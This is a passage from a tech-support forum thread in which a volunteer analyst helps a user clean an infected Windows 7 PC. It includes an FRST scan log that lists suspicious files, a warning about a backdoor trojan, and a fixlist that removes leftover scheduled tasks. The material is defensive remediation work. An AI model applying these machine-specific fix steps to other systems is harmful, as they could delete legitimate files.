2016-10-12 13:55 - 2016-09-12 22:49 - 00260608 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2016-10-12 13:55 - 2016-09-12 22:49 - 00254464 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2016-10-12 13:55 - 2016-09-12 22:49 - 00223232 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2016-10-12 13:55 - 2016-09-12 22:49 - 00172032 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2016-10-12 13:55 - 2016-09-12 22:49 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2016-10-12 13:55 - 2016-09-12 22:49 - 00141312 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll
2016-10-12 13:55 - 2016-09-12 22:49 - 00099840 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2016-10-12 13:55 - 2016-09-12 22:49 - 00076800 _____ (Microsoft Corporation) C:\Windows\system32\adsmsext.dll
2016-10-12 13:55 - 2016-09-12 22:49 - 00065536 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2016-10-12 13:55 - 2016-09-12 22:49 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2016-10-12 13:55 - 2016-09-12 22:49 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2016-10-12 13:55 - 2016-09-12 22:49 - 00017408 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2016-10-12 13:55 - 2016-09-12 22:29 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2016-10-12 13:55 - 2016-09-12 22:28 - 02399232 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2016-10-12 13:55 - 2016-09-12 22:26 - 00226304 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2016-10-12 13:55 - 2016-09-12 22:26 - 00124416 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2016-10-12 13:55 - 2016-09-12 22:26 - 00098304 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2016-10-12 13:55 - 2016-09-12 22:25 - 00036352 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2016-10-12 13:55 - 2016-09-12 22:25 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2016-10-12 13:55 - 2016-09-12 22:25 - 00015872 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2016-10-12 13:55 - 2016-09-09 20:01 - 01310528 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2016-10-12 13:55 - 2016-09-09 20:00 - 00400896 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2016-10-12 13:55 - 2016-09-09 20:00 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2016-10-12 13:55 - 2016-09-09 19:59 - 00644096 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2016-10-12 13:55 - 2016-09-09 19:59 - 00050688 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2016-10-12 13:55 - 2016-09-09 19:59 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2016-10-12 13:55 - 2016-09-09 19:59 - 00038912 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2016-10-12 13:55 - 2016-09-09 19:59 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2016-10-12 13:55 - 2016-09-09 19:42 - 00097792 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2016-10-12 13:55 - 2016-09-09 19:42 - 00050688 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2016-10-12 13:55 - 2016-09-09 19:42 - 00029696 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2016-10-12 13:55 - 2016-09-09 19:42 - 00016896 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2016-10-12 13:55 - 2016-09-09 19:39 - 00262656 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2016-10-12 13:55 - 2016-09-09 19:37 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2016-10-12 13:55 - 2016-09-08 22:34 - 00208896 _____ (Microsoft Corporation) C:\Windows\system32\WebClnt.dll
2016-10-12 13:55 - 2016-09-08 22:34 - 00087040 _____ (Microsoft Corporation) C:\Windows\system32\davclnt.dll
2016-10-12 13:55 - 2016-09-08 16:49 - 00117248 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxdav.sys
2016-10-12 13:55 - 2016-08-29 17:12 - 12880384 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2016-10-12 13:55 - 2016-08-29 17:12 - 01806848 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll
2016-10-12 13:55 - 2016-08-29 17:12 - 01499648 _____ (Microsoft Corporation) C:\Windows\system32\ExplorerFrame.dll
2016-10-12 13:55 - 2016-08-29 16:55 - 02972672 _____ (Microsoft Corporation) C:\Windows\explorer.exe
2016-10-12 13:55 - 2016-08-12 18:31 - 00008192 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll
2016-10-12 13:55 - 2016-08-12 18:31 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx
2016-10-12 13:55 - 2016-08-12 18:31 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll
2016-10-12 13:55 - 2016-08-06 17:15 - 00054272 _____ (Microsoft Corporation) C:\Windows\system32\WsmRes.dll
2016-10-12 13:55 - 2016-08-06 16:53 - 00012288 _____ (Microsoft Corporation) C:\Windows\system32\wsmprovhost.exe
2016-10-12 13:55 - 2016-08-06 16:53 - 00010240 _____ (Microsoft Corporation) C:\Windows\system32\wsmplpxy.dll
2016-10-12 13:55 - 2016-06-14 17:21 - 01176064 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2016-10-12 13:55 - 2016-06-14 17:21 - 00504320 _____ (Microsoft Corporation) C:\Windows\system32\msscp.dll
2016-10-12 13:55 - 2016-06-14 17:21 - 00265216 _____ (Microsoft Corporation) C:\Windows\system32\msnetobj.dll
2016-10-12 13:55 - 2016-06-14 17:21 - 00179200 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2016-10-12 13:55 - 2016-06-14 17:21 - 00145920 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2016-10-12 13:55 - 2016-06-14 17:21 - 00106496 _____ (Microsoft Corporation) C:\Windows\system32\cryptnet.dll
2016-10-12 13:55 - 2016-06-14 17:21 - 00103424 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2016-10-12 13:55 - 2016-06-14 17:21 - 00008704 _____ (Microsoft Corporation) C:\Windows\system32\pcaevts.dll
2016-10-12 13:55 - 2016-06-14 17:21 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2016-10-12 13:55 - 2016-06-14 17:05 - 00100352 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2016-10-12 13:55 - 2016-06-14 17:05 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2016-10-12 13:55 - 2016-06-14 17:05 - 00023040 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2016-10-12 13:55 - 2016-06-14 17:00 - 00010752 _____ (Microsoft Corporation) C:\Windows\system32\msmmsp.dll
2016-10-12 13:55 - 2016-06-14 16:55 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\pcawrk.exe
2016-10-12 13:55 - 2016-06-14 16:55 - 00008192 _____ (Microsoft Corporation) C:\Windows\system32\pcalua.exe
2016-10-12 13:55 - 2016-06-14 16:54 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\pcadm.dll
2016-10-11 20:52 - 2016-10-11 20:52 - 00000216 _____ C:\Users\violeta\Desktop\Realm of the Mad God.url
2016-10-10 20:51 - 2016-10-10 20:51 - 00000000 ____D C:\Users\violeta\AppData\LocalLow\BuKaGameStudio
2016-10-10 20:50 - 2016-10-10 20:50 - 00000216 _____ C:\Users\violeta\Desktop\Hunger Dungeon.url
2016-10-06 17:34 - 2016-10-12 15:17 - 00002052 _____ C:\Windows\epplauncher.mif
2016-10-06 17:19 - 2016-10-06 17:21 - 11640664 _____ (Microsoft Corporation) C:\Users\violeta\Downloads\MSEInstall(1).exe
2016-10-06 17:18 - 2016-10-06 17:18 - 14324408 _____ (Microsoft Corporation) C:\Users\violeta\Downloads\MSEInstall.exe
2016-10-06 17:17 - 2016-10-06 17:18 - 00000000 ____D C:\Users\violeta\AppData\Roaming\Duelyst
2016-10-06 11:21 - 2016-10-06 11:21 - 00000216 _____ C:\Users\violeta\Desktop\Duelyst.url
2016-10-06 11:13 - 2016-10-06 11:13 - 00000134 _____ C:\Users\violeta\Desktop\Spacewar.url
2016-10-04 07:09 - 2016-10-04 07:10 - 00000035 _____ C:\Users\violeta\Desktop\Nikola123456.txt
2016-09-30 20:23 - 2016-09-30 20:26 - 00000000 ____D C:\Users\violeta\Desktop\save eu4
2016-09-26 19:50 - 2016-09-26 19:50 - 01091008 _____ (Unity Technologies ApS) C:\Users\violeta\Downloads\UnityWebPlayer.exe
2016-09-25 07:46 - 2016-10-13 08:33 - 00000000 ____D C:\Users\violeta\AppData\LocalLow\uTorrent
2016-09-24 12:29 - 2016-09-25 07:46 - 00000000 ____D C:\Program Files\Mozilla Firefox
2016-09-21 08:47 - 2016-08-05 17:13 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2016-09-19 21:10 - 2016-10-16 11:43 - 00000000 ____D C:\Users\violeta\Desktop\fajlovi sa flesa
2016-09-19 20:35 - 2016-09-19 20:35 - 00000000 ____D C:\Users\violeta\AppData\Local\{26E83D09-9D35-755D-7492-57CF5473C38A}
2016-09-18 21:36 - 2016-09-18 21:37 - 00000000 ____D C:\Users\violeta\AppData\Local\HirezLauncherUI
2016-09-18 21:31 - 2016-10-17 03:24 - 00000000 ____D C:\Program Files\Hi-Rez Studios
2016-09-18 21:14 - 2016-09-18 21:14 - 00000215 _____ C:\Users\violeta\Desktop\Worms Reloaded.url
2016-09-18 21:12 - 2016-09-18 21:12 - 00000216 _____ C:\Users\violeta\Desktop\Paladins.url
2016-09-18 16:29 - 2016-09-18 16:29 - 01176864 _____ C:\Users\violeta\Downloads\Thaumcraft Mod Installer 1.7.10.exe
2016-09-18 16:27 - 2016-09-18 16:27 - 01171232 _____ C:\Users\violeta\Downloads\Ars Magica 2 Mod Installer 1.7.10.exe
2016-09-18 16:22 - 2016-09-18 16:22 - 00167936 _____ (ICSharpCode.net) C:\Users\violeta\Downloads\ICSharpCode.SharpZipLib1.dll
2016-09-18 16:21 - 2016-09-18 16:21 - 01184544 _____ C:\Users\violeta\Downloads\Buildcraft Mod Installer 1.7.10.exe
2016-09-18 16:20 - 2016-09-18 16:20 - 01174304 _____ C:\Users\violeta\Downloads\Not Enough Items Mod Installer 1.7.10.exe
2016-09-18 16:19 - 2016-09-18 19:05 - 00000000 ____D C:\Users\violeta\AppData\Roaming\.minecraft
2016-09-17 18:55 - 2016-09-17 18:55 - 00000459 _____ C:\Users\violeta\Downloads\$SpriteCollection.cs
2016-09-17 18:50 - 2016-07-27 01:25 - 17711616 _____ C:\Users\violeta\Desktop\voice tcg tester.exe
2016-09-17 18:18 - 2016-02-12 07:58 - 00003471 _____ C:\Users\violeta\Desktop\LoadingScreenManager.cs

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-10-17 06:41 - 2016-05-17 18:21 - 00000000 ____D C:\Program Files\TunnelBear
2016-10-17 06:30 - 2012-04-14 09:03 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2016-10-17 05:47 - 2012-04-15 11:58 - 00000886 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-10-17 03:35 - 2009-07-14 06:34 - 00026320 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2016-10-17 03:35 - 2009-07-14 06:34 - 00026320 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2016-10-17 03:26 - 2015-11-24 15:38 - 00000000 ____D C:\Users\violeta\AppData\Local\LogMeIn Hamachi
2016-10-17 03:23 - 2016-03-12 14:44 - 00000091 _____ C:\HaxLogs.txt
2016-10-17 03:23 - 2013-06-01 20:30 - 00065536 _____ C:\Windows\system32\Ikeext.etl
2016-10-17 03:23 - 2009-07-14 06:53 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-10-16 16:02 - 2015-01-12 21:22 - 00000000 ____D C:\Program Files\Steam
2016-10-16 08:56 - 2016-03-12 13:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\UnHackMe
2016-10-16 08:56 - 2016-03-12 13:53 - 00000000 ____D C:\Program Files\UnHackMe
2016-10-16 08:53 - 2014-06-19 12:46 - 00000000 ____D C:\Program Files\Electronic Arts
2016-10-16 08:53 - 2011-12-24 12:37 - 00000000 ___HD C:\Program Files\InstallShield Installation Information
2016-10-16 08:52 - 2009-07-14 06:52 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2016-10-16 08:39 - 2013-03-01 16:15 - 00000000 ____D C:\Users\violeta\Documents\spore
2016-10-16 07:53 - 2016-03-12 14:11 - 00000264 _____ C:\Windows\system32\PARTIZAN.TXT
2016-10-15 17:30 - 2014-04-13 13:53 - 00796352 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2016-10-15 17:30 - 2014-04-13 13:53 - 00142528 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
2016-10-15 17:30 - 2011-12-19 14:45 - 00000000 ____D C:\Windows\system32\Macromed
2016-10-14 22:04 - 2015-03-05 20:50 - 00000000 ____D C:\AdwCleaner
2016-10-14 21:37 - 2012-03-27 18:25 - 00000000 ____D C:\Program Files\Common Files\Steam
2016-10-14 10:39 - 2009-07-14 04:37 - 00000000 ____D C:\Windows\inf
2016-10-13 16:40 - 2012-04-01 13:19 - 00000000 ____D C:\Users\violeta\AppData\Roaming\uTorrent
2016-10-13 15:42 - 2016-09-11 14:11 - 00000000 ____D C:\Users\violeta\Documents\voice tcg try
2016-10-13 14:41 - 2016-05-15 11:50 - 00000000 ____D C:\ProgramData\Unity
2016-10-13 14:17 - 2016-09-11 13:44 - 00000000 ____D C:\Program Files\Unity
2016-10-13 14:00 - 2011-12-18 17:09 - 00795958 _____ C:\Windows\system32\PerfStringBackup.INI
2016-10-13 12:22 - 2009-07-14 04:37 - 00000000 ____D C:\Windows\rescache
2016-10-13 08:29 - 2016-09-12 07:05 - 03913080 _____ C:\Windows\system32\FNTCACHE.DAT
2016-10-13 08:26 - 2016-04-14 13:26 - 00000000 ___SD C:\Windows\system32\CompatTel
2016-10-13 08:26 - 2016-04-14 13:26 - 00000000 ____D C:\Windows\system32\appraiser
2016-10-13 08:25 - 2009-07-14 04:37 - 00000000 ____D C:\Windows\system32\Dism
2016-10-13 08:23 - 2014-10-08 17:04 - 00000000 ____D C:\Program Files\Microsoft Silverlight
2016-10-12 22:45 - 2014-10-15 21:38 - 00000000 ____D C:\Windows\system32\MRT
2016-10-12 22:44 - 2014-10-08 17:06 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2016-10-12 22:44 - 2012-01-09 12:12 - 141042968 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2016-10-11 20:51 - 2013-08-29 16:54 - 00000000 ____D C:\Users\violeta\AppData\Roaming\Origin
2016-10-11 20:51 - 2013-08-28 16:57 - 00000000 ____D C:\ProgramData\Origin
2016-10-11 20:50 - 2016-01-02 20:19 - 00000000 ____D C:\Program Files\Origin
2016-10-11 20:48 - 2016-01-02 20:23 - 00000000 ____D C:\Users\violeta\AppData\Local\Origin
2016-10-09 22:25 - 2012-08-26 16:39 - 00000444 ____H C:\Windows\Tasks\Norton Security Scan for violeta.job
2016-10-06 20:12 - 2016-04-23 12:46 - 00000000 ____D C:\Users\violeta\BrawlhallaReplays
2016-10-06 17:16 - 2014-10-06 16:25 - 00000000 ____D C:\ProgramData\Package Cache
2016-09-30 20:21 - 2015-08-03 12:30 - 00000000 ____D C:\Program Files\TeamViewer
2016-09-27 08:50 - 2016-09-15 06:58 - 00000000 ____D C:\Users\violeta\Desktop\Za crtanje
2016-09-26 19:51 - 2012-04-16 11:29 - 00000000 ____D C:\Users\violeta\AppData\Local\Unity
2016-09-25 07:46 - 2012-05-03 09:27 - 00000000 ____D C:\Program Files\Mozilla Maintenance Service
2016-09-24 10:32 - 2016-03-12 13:53 - 00000000 ____D C:\Users\Public\Documents\regruninfo
2016-09-24 10:28 - 2016-03-27 13:07 - 00000059 _____ C:\Users\violeta\AppData\Local\UserProducts.xml
2016-09-24 10:28 - 2016-03-12 13:53 - 00000000 ____D C:\Users\violeta\Documents\RegRun2
2016-09-21 08:29 - 2009-07-14 06:53 - 00032592 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2016-09-19 20:36 - 2014-07-02 10:34 - 00000000 ____D C:\Users\violeta\AppData\Local\Battle.net
2016-09-19 20:09 - 2016-08-25 15:05 - 00000000 ____D C:\Program Files\Battle.net
2016-09-18 21:42 - 2014-01-27 12:12 - 00000000 ____D C:\ProgramData\Hi-Rez Studios
2016-09-18 21:41 - 2012-08-22 17:38 - 00000000 ____D C:\Users\violeta\Documents\My Games
2016-09-18 21:40 - 2014-01-27 12:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Hi-Rez Studios
2016-09-18 16:27 - 2015-03-06 12:56 - 00000000 ____D C:\Minecraft_Backup
2016-09-17 15:26 - 2015-04-03 12:38 - 00000000 ____D C:\Users\violeta\AppData\Roaming\CodeBlocks
2016-09-17 14:30 - 2016-08-10 10:07 - 00000000 ____D C:\Users\violeta\Desktop\programi

==================== Files in the root of some directories =======

2016-04-24 18:04 - 2015-11-25 14:53 - 0000422 _____ () C:\Program Files\update-PayDay2.bat
2016-04-24 18:04 - 2013-10-12 20:47 - 0000732 _____ () C:\Program Files\visit-www.nosteam.ro.html
2016-03-13 15:32 - 2016-03-13 15:32 - 3120771 _____ () C:\Program Files\Common Files\4gzl5t3d.exe
2016-03-12 12:24 - 2016-03-12 12:24 - 3170418 _____ () C:\Program Files\Common Files\kqhpkjmf.exe
2015-07-05 16:23 - 2015-07-05 16:23 - 0000000 _____ () C:\Users\violeta\AppData\Roaming\6D6C.tmp
2015-06-05 18:51 - 2016-03-12 13:42 - 0000024 _____ () C:\Users\violeta\AppData\Roaming\appdataFr25.bin
2015-02-02 12:52 - 2015-05-09 18:54 - 0000020 _____ () C:\Users\violeta\AppData\Roaming\appdataFr3.bin
2015-06-17 15:58 - 2015-06-17 15:58 - 0000166 _____ () C:\Users\violeta\AppData\Roaming\Camdata.ini
2015-06-17 15:58 - 2015-06-17 15:58 - 0000408 _____ () C:\Users\violeta\AppData\Roaming\CamLayout.ini
2015-06-17 15:58 - 2015-06-17 15:58 - 0000408 _____ () C:\Users\violeta\AppData\Roaming\CamShapes.ini
2012-08-17 18:27 - 2012-08-18 08:07 - 0000212 _____ () C:\Users\violeta\AppData\Roaming\FireArcadeSettings.cfg
2014-07-12 15:17 - 2014-07-12 15:18 - 0000080 _____ () C:\Users\violeta\AppData\Roaming\id.TXT.qjqtinm
2015-01-13 21:01 - 2015-01-13 21:11 - 0000098 _____ () C:\Users\violeta\AppData\Roaming\LauncherSettings_live.cfg
2012-11-03 17:48 - 2014-06-06 19:26 - 0138056 _____ () C:\Users\violeta\AppData\Roaming\PnkBstrK.sys
2015-01-13 21:06 - 2015-01-13 21:07 - 0008142 _____ () C:\Users\violeta\AppData\Roaming\TheHunterSettings_live.bin
2015-01-13 20:56 - 2015-01-13 20:56 - 0000039 _____ () C:\Users\violeta\AppData\Roaming\TheHunterSettings_steam_live.cfg
2015-06-17 15:07 - 2015-06-17 15:07 - 0000096 _____ () C:\Users\violeta\AppData\Roaming\version2.xml
2013-12-19 14:02 - 2015-03-01 14:02 - 0000180 _____ () C:\Users\violeta\AppData\Roaming\WB.CFG
2016-08-04 08:51 - 2016-08-04 08:52 - 0341504 _____ () C:\Users\violeta\AppData\Roaming\wsrv_d6d23f59.dat
2013-07-12 15:49 - 2013-07-12 15:54 - 0081582 _____ () C:\Users\violeta\AppData\Roaming\zulagames.ico
2014-06-12 14:10 - 2014-06-13 13:18 - 0004608 _____ () C:\Users\violeta\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2012-06-27 09:19 - 2012-06-27 09:19 - 0000095 _____ () C:\Users\violeta\AppData\Local\fusioncache.dat
2016-03-12 11:19 - 2016-03-12 11:19 - 0041472 _____ () C:\Users\violeta\AppData\Local\Ganjalax.dat
2016-03-12 11:19 - 2016-03-12 11:19 - 0000187 _____ () C:\Users\violeta\AppData\Local\Ganjalax.exe.config
2014-05-11 12:48 - 2014-05-11 12:48 - 0000851 _____ () C:\Users\violeta\AppData\Local\recently-used.xbel
2014-12-19 18:23 - 2014-12-19 18:23 - 0007605 _____ () C:\Users\violeta\AppData\Local\Resmon.ResmonCfg
2016-03-27 13:07 - 2016-03-27 13:07 - 0000003 _____ () C:\Users\violeta\AppData\Local\updater.log
2016-03-27 13:07 - 2016-09-24 10:28 - 0000059 _____ () C:\Users\violeta\AppData\Local\UserProducts.xml
2012-08-16 08:42 - 2013-04-27 11:43 - 0000000 _____ () C:\ProgramData\fea2c9c08b989e2944104c6544fdfaa4_c
2012-11-04 15:06 - 2012-09-05 15:06 - 0000032 ____R () C:\ProgramData\hash.dat
2014-04-27 11:56 - 2010-11-05 03:58 - 0032768 __RSH (Microsoft Corporation) C:\ProgramData\Microsoft.com
2016-09-14 08:10 - 2016-05-04 16:55 - 73149184 ___SH () C:\ProgramData\msdsrnwj.exe
2016-07-06 17:31 - 2012-08-31 14:08 - 0024772 _____ () C:\ProgramData\P1100DEF.css
2016-07-06 17:31 - 2016-07-06 17:31 - 0004174 _____ () C:\ProgramData\P1100OS.HTM
2016-07-06 17:31 - 2012-08-31 14:08 - 0002944 _____ () C:\ProgramData\P1100SIG.GIF
2014-11-15 15:55 - 2014-11-15 15:55 - 0000000 _____ () C:\ProgramData\spds90.txt
2015-06-02 20:46 - 2015-06-03 16:29 - 4496993 _____ () C:\ProgramData\zydwhsg.html

Files to move or delete:
====================
C:\ProgramData\hash.dat
C:\ProgramData\msdsrnwj.exe
C:\Users\violeta\spopoi.exe


Some files in TEMP:
====================
C:\Users\violeta\AppData\Local\Temp\cdo2111017090.dll
C:\Users\violeta\AppData\Local\Temp\cdo2385742626.dll
C:\Users\violeta\AppData\Local\Temp\cdo683995543.dll
C:\Users\violeta\AppData\Local\Temp\Foxit Updater.exe
C:\Users\violeta\AppData\Local\Temp\HiPatchSelfUpdateWindow.exe
C:\Users\violeta\AppData\Local\Temp\HiRezLauncherControls.dll
C:\Users\violeta\AppData\Local\Temp\libeay32.dll
C:\Users\violeta\AppData\Local\Temp\msvcr120.dll
C:\Users\violeta\AppData\Local\Temp\sqlite3.dll


==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2016-10-15 12:14

==================== End of FRST.txt ============================
Attached Files
File Type: txt Addition.txt (57.7 KB, 94 views)
nikolap is offline  
Old 10-17-2016, 08:08 PM   #8
Security Team
Moderator, Analyst
Rangemaster, TSF Academy
 
chemist's Avatar

Microsoft Most Valuable Professional
 
Join Date: Oct 2007
Location: Georgia
Posts: 29,790
OS: XP/Win7/Win10



Hello again, nikolap. You didn't answer my question. Did you also delete all those cracked installers listed in the ckfiles.txt, at least all the ones that were true cracks?

Also, are you aware your System Restore is disabled? Did you disable it?

----------------------------------------------------

One or more of the identified infections is a backdoor trojan.

This type of infection allows hackers to remotely control your computer, log keystrokes, steal critical system information, and download and execute files without your knowledge.

If you do any banking or other financial transactions on the PC or if it should contain any other sensitive information, please get to a known clean computer and change all passwords where applicable, and it would be wise to contact those same financial institutions to apprise them of your situation.

Do not change passwords or do any transactions from the infected computer until it has been cleaned.

------------------------------------------------------

Please download the Suspicious File Packer and Save it to your Desktop.
  • Unzip it to the desktop and run it.
  • Copy/paste the following list of files into the Suspicious File Packer window:

    C:\Windows\system32\Microsoft.com

  • Allow SFP to pack the files by clicking Continue
  • This will generate a CAB archive on your desktop named requested-files[Date/Time].cab
  • Please submit it to this site ==> Submit a Malware Sample and include this link in the message->>http://www.techsupportforum.com/forums/f50/not-working-correctly-windows-firewall-1163025.html#post7255345
  • You can then delete the requested-files.cab file from your desktop, once you have uploaded it to the above recipient.
  • Please let me know you submitted the file.
------------------------------------------------------
__________________
Our services are free, but you may contribute to the author of ComboFix via PayPal

Proud member of UNITE

Microsoft MVP - Consumer Security 2014, 2015
chemist is offline  
Old 10-17-2016, 11:34 PM   #9
Registered Member
 
Join Date: Oct 2016
Posts: 31
OS: windows 7 service pack 1



I am sorry to bother you but i cant seem to find this file,i tryed placing the address in the browser,which made an executable.your instructions say this should be some form of a text file.
C:\Windows\system32\Microsoft.com
To answer your previous questions at the very least.
1.i did delete those installers
2.I was not aware of the system restore being disabled,since i never used it,i have no idea how to open it.
nikolap is offline  
Old 10-18-2016, 04:53 AM   #10
Security Team
Moderator, Analyst
Rangemaster, TSF Academy
 
chemist's Avatar

Microsoft Most Valuable Professional
 
Join Date: Oct 2007
Location: Georgia
Posts: 29,790
OS: XP/Win7/Win10



Hello again, nikolap. That Microsoft.com file is an executable.
__________________
Our services are free, but you may contribute to the author of ComboFix via PayPal

Proud member of UNITE

Microsoft MVP - Consumer Security 2014, 2015
chemist is offline  
Old 10-18-2016, 10:41 AM   #11
Registered Member
 
Join Date: Oct 2016
Posts: 31
OS: windows 7 service pack 1



i have now submitted the file.
nikolap is offline  
Old 10-18-2016, 02:14 PM   #12
Security Team
Moderator, Analyst
Rangemaster, TSF Academy
 
chemist's Avatar

Microsoft Most Valuable Professional
 
Join Date: Oct 2007
Location: Georgia
Posts: 29,790
OS: XP/Win7/Win10



Hello again, nikolap. Thanks for submitting the file.

Go Control Panel > System > System Protection > click on Windows (C:)(System) > Configure > Restore system settings and previous versions of files > OK > OK.

Were you able to turn it on?

----------------------------------------------------

Please note that these fixes are not instantaneous. Most infections require more than one round to properly eradicate.

Please stay with me until given the 'all clear' even if symptoms seemingly abate.

Kindly follow my instructions and please do no fixing on your own or running of scanners unless requested by a helper.

------------------------------------------------------

If there are any personal files, pics, etc. on your computer you cannot live without, back them up now just as a precaution.

https://windows.microsoft.com/en-us/w...#1TC=windows-7

Also, if you haven't done so already, create a system repair disc. It's really easy and quick.

https://pcsupport.about.com/od/window...-windows-7.htm

------------------------------------------------------

I noticed you have BS Player Toolbar installed.

Please read this and decide if you want to keep it >> SystemLookup - fed66dc5-1b74-4a04-8f5c-15c5ace2b9a5

You can uninstall it via Programs and Features in your Control Panel.

If you decide to uninstall it, also delete the following Folder if it still exists:

C:\Program Files\BS_Player

------------------------------------------------------

Please uninstall the following via Start->(or Computer)->Control Panel->(Programs)->Programs and Features if it still exists:

Contextual Tool Yourprofitclub<<This entry is classified as malware, spyware, adware, or other potentially unwanted software.

------------------------------------------------------
  • Open Notepad (Start > All Programs > Accessories > Notepad).
  • Please copy all the text in the codebox below. (To do this highlight the contents of the box, right-click on it and select Copy. Right-click in the open Notepad and select Paste).
  • Save it as fixlist.txt next to FRST.exe
  • If asked to change 'Encoding:' to 'Unicode:', please agree and save it.

    NOTE: Both FRST.exe and the fixlist.txt must be in the same location or the fix will not work.


    Code:
    start
    createrestorepoint:
    TuneUp Utilities 2013 (Version: 13.0.3000.138 - TuneUp Software) Hidden
    TuneUp Utilities Language Pack (en-US) (Version: 13.0.3000.138 - TuneUp Software) Hidden
    Task: {01835097-7B05-4094-B39B-A6F6BF09B715} - \AdobeFlashPlayerUpdate 2 -> No File <==== ATTENTION
    Task: {05117A57-15BB-4310-AB94-ABEB78135006} - \{CFFDB85C-56BE-4D73-B744-97DB7D610B8E} -> No File <==== ATTENTION
    Task: {0906990C-C047-4C7D-8D22-5255F1024FB3} - \{1E9494FA-6CA3-400B-B661-31837511C7EE} -> No File <==== ATTENTION
    Task: {1C7306D1-9834-4D43-A2C5-FEFAE0216B5D} - \{3E27A315-206F-40D5-88C8-C29D09D3BAEB} -> No File <==== ATTENTION
    Task: {258FDF9B-E6BF-4C1D-85FE-93C16438F4BE} - \RealPlayerRealUpgradeScheduledTaskS-1-5-21-3268508096-794200350-1188608446-1000 -> No File <==== ATTENTION
    Task: {334E8B80-9763-434E-8437-770A5DC4A520} - \20sve2tm -> No File <==== ATTENTION
    Task: {39B9DF0B-CC67-48F1-A4C1-2BADF10A3AC3} - \{33C192B0-0851-4C18-BB29-6CDD784756BE} -> No File <==== ATTENTION
